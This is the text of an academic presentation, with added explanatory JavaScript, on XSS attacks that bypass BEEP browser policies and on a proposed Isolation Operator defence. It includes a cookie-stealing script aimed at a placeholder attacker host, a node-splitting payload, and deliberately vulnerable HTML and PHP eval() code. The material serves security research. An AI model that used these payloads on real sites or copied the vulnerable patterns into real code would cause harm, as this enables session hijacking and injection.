Code-Injection Attacks in Browsers Supporting Policies (PowerPoint presentation)

SLIDE 1

Code-Injection Attacks in Browsers Supporting Policies

Elias Athanasopoulos, Vasilis Pappas, and Evangelos P. Markatos FORTH-ICS

SLIDE 2

What is it all about?

 New code-injection attacks or return-to-libc attacks in the web

Elias Athanasopoulos, FORTH-ICS | Code-Injection Attacks in Browsers Supporting Policies

SLIDE 3

Motivation

 Cross-Site Scripting (XSS) is considered a major threat

 XSS attacks are roughly 80% of all documented security vulnerabilities (Symantec, 2007)
 McAfee: Websites Vulnerable to Attacks (4th May 2009)

 Web sites are becoming richer

 AJAX interfaces
 Increase of client-side code (JavaScript)

SLIDE 4

XSS Mitigation

 Static analysis
 Taint analysis
 Server/Client sanitization
 HTTP Cookies
 Enforcing policies in the browser

SLIDE 5

XSS Mitigation

 Static analysis
 Taint analysis
 Server/Client sanitization
 HTTP Cookies
 Enforcing policies in the browser

 T. Jim, N. Swamy, and M. Hicks. BEEP: Defeating script injection attacks with browser-enforced embedded policies (ACM WWW 2007)

SLIDE 6

Overview

 How can an attacker bypass BEEP

 return-to-libc attacks in the web

 A new framework for XSS mitigation based on Isolation Operators

SLIDE 7

Roadmap

 XSS Short Introduction
 BEEP & Attacks
 Isolation Operators
 Conclusion
 Demo

SLIDE 8

XSS Short Introduction

 XSS Short Introduction  BEEP & Attacks  Isolation Operators  Conclusion  Demo

SLIDE 9

An Example

 A user posts a comment to a blog story
 She enters some JavaScript inside

 My cool comment.

<script>location.href = www.attacker.com/document.cookie
 </script>

 Alice is also browsing the story; the script renders in her browser
 The attacker receives a request to her server with Alice's cookie

SLIDE 10

Stealing Cookies…

 The attacker has managed to steal Alice's cookie
 The attacker is able to hijack Alice's session

 Log in to the web site with Alice's credentials
 Perform actions in the web site as if she were Alice

SLIDE 11

…is not the only way!

 The attacker could inject JavaScript code that performs operations on the web site

 Delete Alice's comments
 Post comments (with Alice's credentials)

 If Alice had administrator privileges

 The attacker could, on some occasions, take full control of the web site

SLIDE 12

XSS != Cookie Stealing

 A buffer overflow attack compromises an application

 This can sometimes lead to compromising the host

 An XSS attack compromises a web application

 This can sometimes lead to compromising a whole web system (e.g. the "Google system")

SLIDE 13

BEEP & Attacks

 XSS Short Introduction  BEEP & Attacks  Isolation Operators  Conclusion  Demo

SLIDE 14

BEEP

 The web server embeds policies in web documents
 The web browser

 Identifies trusted and non-trusted client-side code
 Executes client-side code according to the defined policies

SLIDE 15

Assumptions

Web browsers have all the required complexity in order to detect (parse) and render a script

SLIDE 16

Assumptions

The web application developer knows exactly which scripts are trusted to be executed in the web browser

grep -i "\<script" -o fb-home.php | wc -l
23

SLIDE 17

Policy Enforcement

 Script Whitelisting
 DOM Sandboxing

SLIDE 18

Script Whitelisting

 Web server

 Generates a cryptographic hash for each script it produces
 Injects in each web document the list of cryptographic hashes (white-list) corresponding to the trusted scripts

 Web browser

 Using a hook, it checks whether there is a hash in the white-list for each script before execution

SLIDE 19

Limitations

 No validation of

 Script location in the web page
 Asynchronous events (onload, onclick, etc.)

SLIDE 20

return-to-libc in the web

 An attacker could mount an attack using existing white-listed JavaScript code
 return-to-libc: during a buffer overflow, the attacker transfers control to a location in libc instead of to code in the injected buffer

SLIDE 21

Examples

 Annoyance
 Data Loss
 Complete Takeover

SLIDE 22

Vulnerable Blog

<html>
<head> <title> Blog! </title> </head>
<body>
<a onclick="logout();">Logout</a>
<div class="blog_entry" id="123">{TEXT...} <input type="button" onclick="delete(123);"></div>
<div class="blog_comments">
<li> <img onload="logout();" src="logo.gif">
<li> <img onload="window.location.href='http://www.google.com';" src="logo.gif">
<li> <img onload="delete(123);">
</div>
<a onclick="window.location.href='http://www.google.com';">Google</a>
</body>
</html>
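The following is an added example, not BEEP's code nor the authors' implementation: a toy model of the script whitelisting of slide 18 applied to a blog document shaped like the one above, showing both the hash check and the "return-to-libc in the web" gap of slides 19-20. The hash function fnv1a32 is a stand-in for the cryptographic hash a real deployment would use; the regexes, the site script and the two injected comments are constructed for this example.

```javascript
// Added example (not BEEP's or the authors' code): BEEP-style script
// whitelisting and why reuse of white-listed code slips through it.
// fnv1a32 stands in for a real cryptographic hash (assumption).

function fnv1a32(text) {
  let h = 0x811c9dc5;
  for (const byte of Buffer.from(text, "utf8")) {
    h ^= byte;
    h = Math.imul(h, 0x01000193) >>> 0;
  }
  return h.toString(16).padStart(8, "0");
}

// Server side: the developer's trusted scripts become a list of hashes that
// is shipped with the document.
function buildWhitelist(trustedScripts) {
  return new Set(trustedScripts.map(s => fnv1a32(s.trim())));
}

const SCRIPT_RE = /<script[^>]*>([\s\S]*?)<\/script>/gi;
const HANDLER_RE = /\son\w+\s*=\s*"([^"]*)"/gi;

// Browser side: the execution hook. Inline <script> bodies run only if their
// hash is white-listed; event-handler attributes run unchecked, and nothing
// looks at where in the document a script sits (the limitations of slide 19).
function hookedExecution(html, whitelist) {
  const executed = [];
  const blocked = [];
  for (const m of html.matchAll(SCRIPT_RE)) {
    const body = m[1].trim();
    (whitelist.has(fnv1a32(body)) ? executed : blocked).push(body);
  }
  for (const m of html.matchAll(HANDLER_RE)) {
    executed.push(m[1].trim());
  }
  return { executed, blocked };
}

// Constructed sample: the site's own script plus two injected comments.
const SITE_SCRIPT = 'function logout() { location.href = "/logout"; }';
const BLOG_PAGE = `<html><body>
<script>${SITE_SCRIPT}</script>
<a onclick="logout();">Logout</a>
<div class="blog_comments">
<li> <script>alert("injected");</script>
<li> <img onload="logout();" src="logo.gif">
</div>
</body></html>`;

function analyzeBlog() {
  return hookedExecution(BLOG_PAGE, buildWhitelist([SITE_SCRIPT]));
}

// Comment 1 is new code and is blocked by the hash check. Comment 2 carries no
// new code at all: it re-invokes the white-listed logout() from an onload
// handler inside the untrusted comment area, so the hook lets it run.
const result = analyzeBlog();
console.log("blocked:", result.blocked);
console.log("executed:", result.executed);
```

The two entries of `logout();` in the executed list are the point: hashing tells the browser whether a script is one the developer wrote, but not whether the developer placed it where it now runs. Closing that gap needs a location-aware policy, which is what the DOM-sandboxing slides that follow address.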

SLIDE 23

Annoyance

(The same blog document as on slide 22; the injected comments that call logout() or redirect the page make up the annoyance case.)

SLIDE 24

Data Loss

(The same blog document as on slide 22; the injected comment that calls delete(123) is the data-loss case.)

SLIDE 25

DOM Sandboxing

 The server marks specific regions as trusted

 <div class=untrust> … no code here … </div>

 The browser executes code only in trusted regions

SLIDE 26

Vulnerability

 Node splitting

 <div class=untrusted> {content} </div>
 content := </div><div class=trusted> {script} </div><div class=untrusted>

 Countermeasure

 Noncespaces: Using Randomization to Enforce Information Flow Tracking and Thwart XSS Attacks (NDSS 2009)
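As an added example (not the authors' code and not the Noncespaces implementation), the node-splitting problem of this slide against a naive template, followed by two defences: HTML-escaping the untrusted text, and, in the spirit of Noncespaces, tagging the trust markers with a per-response random value the attacker cannot guess. The templates, the region-counting check and the fixed nonce are constructed for the example.

```javascript
// Added example (not the authors' or Noncespaces' code): DOM sandboxing,
// node splitting, and two ways to keep untrusted content out of trusted regions.

// Naive template: untrusted content is interpolated as raw HTML.
function renderNaive(comment) {
  return `<div class=untrusted>${comment}</div>`;
}

// Defence 1: escape the characters that can open or close tags or attributes.
function escapeHtml(text) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return text.replace(/[&<>"']/g, c => map[c]);
}
function renderEscaped(comment) {
  return `<div class=untrusted>${escapeHtml(comment)}</div>`;
}

// Defence 2: trust markers carry a nonce. A real server draws it from a CSPRNG
// for every response; a fixed value is used here so the example is deterministic.
const NONCE = "k7Qx2p"; // constructed, not a real per-response nonce
function renderNonced(comment) {
  return `<div class=untrusted-${NONCE}>${comment}</div>`;
}

// The browser's view: how many regions would the policy treat as trusted?
// Only the marker form the server actually uses is honoured.
function countTrustedRegions(html, nonce) {
  const marker = nonce ? `<div class=trusted-${nonce}>` : "<div class=trusted>";
  return html.split(marker).length - 1;
}

// Constructed attacker comment from slide 26: close the untrusted div, open a
// trusted one, and reopen an untrusted one so the page still parses.
const SPLITTING_COMMENT =
  '</div><div class=trusted>alert("injected")</div><div class=untrusted>';

function demoSplitting() {
  return {
    naive: countTrustedRegions(renderNaive(SPLITTING_COMMENT)),          // 1
    escaped: countTrustedRegions(renderEscaped(SPLITTING_COMMENT)),      // 0
    nonced: countTrustedRegions(renderNonced(SPLITTING_COMMENT), NONCE), // 0
  };
}
console.log(demoSplitting());
```

Note that the nonce alone stops the attacker from manufacturing a trusted region but still lets the comment close the untrusted div and break the page structure; escaping keeps the markup well-formed. In practice the two are combined: escape what can be escaped, and randomise the markers so that any leftover injection point cannot be promoted to trusted.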

SLIDE 27

DOM Sandboxing Limitations

 Marking div/span elements with trust properties requires human effort

grep -i "\<div" -o fb-home.php | wc -l
2708
grep -i "\/span" -o fb-home.php | wc -l
982

 Sometimes an attack can take place without having a DOM tree

 Secure Content Sniffing for Web Browsers, or How to Stop Papers from Reviewing Themselves (Oakland 2009)

SLIDE 28

Isolation Operators

 XSS Short Introduction  BEEP & Attacks  Isolation Operators  Conclusion  Demo

SLIDE 29

Overview

 We propose a framework for complete isolation of trusted client-side code
 Key properties

 Attack coverage
 Easy implementation
 Low overhead

SLIDE 30

Architecture

 Code separation at development time
 Isolation operators
 Browser actions

SLIDE 31

Code Separation

 We propose client-side code separation at development time
 Server-side technologies already use similar code separation schemes

 PHP (<?php and ?>)

 Enforcing the scheme in JavaScript can successfully tag all legitimate JavaScript

SLIDE 32

Example

<html>
<img onload+="render();">
<div class='welcome'>
<<<< alert("Hello World"); >>>>
</div>
</html>

SLIDE 33

Isolation Operators

 An Isolation Operator (IO) acts on entire blocks of code
 An IO transposes a block of code into a new isolated domain
 Code in the isolated domain cannot be executed ad hoc
 The code must be de-isolated first and then executed

SLIDE 34

IO Examples

 XOR
 Symmetric encryption (e.g. AES)
 Matrix multiplication

 Create a matrix with the bytes of a script
 Multiply it with a matrix

SLIDE 35

IO Examples

(Same list as on slide 34.)

SLIDE 36

In Action

<html>
<div class='welcome'>
<<<< alert("Hello World"); >>>>
</div>
</html>

SLIDE 37

Applying IO

<html>
<div class='welcome'>
<script> vpSUlJTV2NHGwJyW/NHY... </script>
</div>
</html>

SLIDE 38

Browser Actions

 Policies are expressed in the browser environment as actions
 The browser de-isolates and executes client-side code, instead of simply executing it
 Example

 Look for X-IO-Key in HTTP headers
 Apply XOR (X-IO-Key) and execute
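The following is an added example, not the authors' implementation: an XOR Isolation Operator as sketched on slides 33 to 38, with both halves of the scheme. The server XORs each trusted script block with a key and emits it base64-encoded; the browser reads the key from the X-IO-Key header, de-isolates the block and only then hands it to the engine. The key value, the base64 transport encoding of the key, and the rule that a block which is not well-formed base64 is rejected are assumptions of this example; parsing with new Function stands in for execution so the script is never run.

```javascript
// Added example (not the authors' code): XOR Isolation Operator and the
// matching browser action. Key, encodings and the rejection rule are assumptions.

const IO_KEY = Buffer.from([0xd3, 0x4f, 0xa1, 0x7c, 0x19, 0xe6, 0x88, 0x2b]); // constructed key

function xorWithKey(bytes, key) {
  const out = Buffer.alloc(bytes.length);
  for (let i = 0; i < bytes.length; i++) out[i] = bytes[i] ^ key[i % key.length];
  return out;
}

// Server side: isolate one trusted script block at production time.
function isolate(script, key) {
  return xorWithKey(Buffer.from(script, "utf8"), key).toString("base64");
}

const BASE64_RE = /^[A-Za-z0-9+/]+={0,2}$/;

// Browser side: de-isolate a block. Anything that is not a well-formed isolated
// block (e.g. plain-text script injected by an attacker) is rejected outright.
function deisolate(block, key) {
  if (block.length % 4 !== 0 || !BASE64_RE.test(block)) return null;
  return xorWithKey(Buffer.from(block, "base64"), key).toString("utf8");
}

// Browser action from slide 38: look up X-IO-Key, de-isolate, then hand the
// source to the engine. Parsing is used here as a stand-in for execution.
function browserAction(headers, block) {
  const keyHeader = headers["x-io-key"];
  if (!keyHeader) return { ran: false, source: null };
  const source = deisolate(block, Buffer.from(keyHeader, "base64"));
  if (source === null) return { ran: false, source: null };
  try {
    new Function(source);            // parse only; the function is never invoked
    return { ran: true, source };
  } catch (e) {
    return { ran: false, source };   // de-isolated bytes are not JavaScript
  }
}

const TRUSTED = 'alert("Hello World");';   // the script from slide 32
const INJECTED = 'alert("injected");';      // constructed attacker script
const HEADERS = { "x-io-key": IO_KEY.toString("base64") };

function demoIsolation() {
  return {
    trusted: browserAction(HEADERS, isolate(TRUSTED, IO_KEY)),
    // attacker pastes raw JavaScript: not an isolated block at all
    rawInjection: browserAction(HEADERS, INJECTED),
    // attacker knows the encoding but not the key: de-isolation yields junk
    encodedInjection: browserAction(HEADERS, Buffer.from(INJECTED, "utf8").toString("base64")),
  };
}
console.log(demoIsolation());
```

Only the block the server isolated de-isolates to valid JavaScript; raw injected text fails the block-format check, and injected text that mimics the encoding turns into bytes that do not parse. The scheme therefore rests entirely on the key being unpredictable to the attacker, which is why it should be fresh per response and must never flow into content an attacker controls, the same requirement the IO-vs-ISR backup slides point to.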

SLIDE 39

Conclusion

 XSS Short Introduction  BEEP & Attacks  Isolation Operators  Conclusion  Demo

SLIDE 40

Conclusion

 Identify limitations of current policy-based approaches for XSS mitigation
 Introduce new XSS attacks

 return-to-libc in the web

 Proposal of an XSS mitigation scheme based on Isolation Operators

SLIDE 41

Ongoing Work

 Implementation of Isolation Operators in three leading web browsers

 Firefox, WebKit (Safari), Chromium

 Implementation of the server-side part in Apache
 Full evaluation

 Attack coverage, server overhead, client overhead, user experience

 Full paper under submission

SLIDE 42

Demo

SLIDE 43

Thank you!

Elias Athanasopoulos FORTH-ICS elathan@ics.forth.gr

SLIDE 44

BACKUP

SLIDE 45

IO vs ISR

 Isolation Operators (IO) are heavily inspired by Instruction Set Randomization (ISR)
 ISR operates on the instruction set
 IOs operate on blocks of source code

SLIDE 46

IO vs ISR

 ISR: alert42("…");
 IO: vpSUlJTV2NHGwJyW/NHY...

SLIDE 47

Why IO for JavaScript?

 Server lacks support for JavaScript handling
 Applying ISR for JavaScript

 Requires at least a full JavaScript parser at the server side
 The source will be parsed twice (once at production time and once at execution time)

SLIDE 48

Evil eval()

<?php
$s = "<div id='malicious'>" . $_GET["id"] . "</div>";
echo $s;
?>
<script>
eval(document.getElementById('malicious').innerHTML);
</script>
